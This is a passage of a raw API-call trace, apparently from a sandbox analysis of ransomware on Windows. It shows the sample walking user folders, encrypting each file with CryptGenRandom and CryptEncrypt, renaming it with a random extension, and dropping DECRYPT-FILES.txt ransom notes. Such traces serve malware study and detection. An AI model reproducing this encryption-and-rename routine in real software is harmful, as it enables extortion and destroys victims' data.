[0088.188] CloseHandle (hObject=0x0) returned 0 [0088.188] CloseHandle (hObject=0x450) returned 1 [0088.188] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.188] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.188] GetTickCount () returned 0x114e7d0 [0088.188] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.188] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.188] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.189] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.189] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.189] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms") returned 115 [0088.189] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa") returned 123 [0088.189] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.j4hh5wa"), dwFlags=0x0) returned 1 [0088.190] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.190] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.190] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.191] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xc67cc5, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x3c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms", cAlternateFileName="5AFE4D~1.CUS")) returned 1 [0088.191] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0088.191] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5afe4de1b92fc382.customDestinations-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" [0088.191] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.191] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0088.191] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=15378) returned 1 [0088.191] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0088.191] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.192] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.192] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.192] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.194] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0088.194] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.195] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.195] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.195] CloseHandle (hObject=0x454) returned 1 [0088.195] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.195] WriteFile (in: hFile=0x450, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0088.196] CloseHandle (hObject=0x0) returned 0 [0088.196] CloseHandle (hObject=0x450) returned 1 [0088.196] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.197] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.197] GetTickCount () returned 0x114e7d0 [0088.197] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.197] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.197] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.197] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.198] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.198] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms") returned 115 [0088.198] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa") returned 123 [0088.198] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.j4hh5wa"), dwFlags=0x0) returned 1 [0088.198] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.199] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.199] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.200] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x15c7376, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x18, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms", cAlternateFileName="7E4DCA~1.CUS")) returned 1 [0088.200] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0088.200] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="7e4dca80246863e3.customDestinations-ms" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" [0088.200] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.200] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x450 [0088.200] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=24) returned 1 [0088.200] CreateFileMappingW (hFile=0x450, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x454 [0088.200] MapViewOfFile (hFileMappingObject=0x454, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0088.201] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0088.201] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0088.201] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.202] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0088.203] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0088.203] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.203] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0088.203] CloseHandle (hObject=0x454) returned 1 [0088.203] SetFilePointerEx (in: hFile=0x450, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.203] WriteFile (in: hFile=0x450, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0088.204] CloseHandle (hObject=0x0) returned 0 [0088.204] CloseHandle (hObject=0x450) returned 1 [0088.204] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.205] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.205] GetTickCount () returned 0x114e7e0 [0088.205] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.205] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0088.205] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0088.205] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0088.206] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0088.206] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms") returned 115 [0088.206] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.EvvTgFj") returned 123 [0088.206] MoveFileExW (lpExistingFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms"), lpNewFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.EvvTgFj" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.evvtgfj"), dwFlags=0x0) returned 1 [0088.207] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.207] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.207] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.207] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c0a5e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.207] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0088.207] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp" [0088.207] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.208] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.208] CloseHandle (hObject=0x0) returned 0 [0088.208] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.208] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c0a5e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.208] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0088.208] CloseHandle (hObject=0x448) returned 1 [0088.208] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0088.208] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\" [0088.208] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp" [0088.208] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.209] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0088.209] CloseHandle (hObject=0x0) returned 0 [0088.209] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0088.209] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0088.209] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0088.209] CloseHandle (hObject=0x440) returned 1 [0088.209] FindNextFileW (in: hFindFile=0x5f8b58, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf9b7c855, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0088.209] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0088.209] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0088.209] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0088.209] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.209] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\jkbimi8.tmp") returned 70 [0088.209] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\jkbimi8.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x440 [0088.211] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0088.211] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0088.211] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt") returned 76 [0088.212] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x444 [0088.212] WriteFile (in: hFile=0x444, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0088.213] CloseHandle (hObject=0x444) returned 1 [0088.213] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned 58 [0088.213] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*" [0088.213] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0088.213] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0088.213] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0088.213] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0088.213] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0088.213] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeca9f1ef, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x639ff80f, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x3, dwReserved0=0x0, dwReserved1=0x0, cFileName="Compressed (zipped) Folder.ZFSendToTarget", cAlternateFileName="COMPRE~1.ZFS")) returned 1 [0088.213] lstrcpyW (in: lpString1=0x3f2df30, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0088.213] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpString2="Compressed (zipped) Folder.ZFSendToTarget" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" [0088.213] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0088.214] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\Compressed (zipped) Folder.ZFSendToTarget" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\sendto\\compressed (zipped) folder.zfsendtotarget"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x448 [0088.214] GetFileSizeEx (in: hFile=0x448, lpFileSize=0x3f2d6f8 | out: lpFileSize=0x3f2d6f8*=3) returned 1 [0088.214] 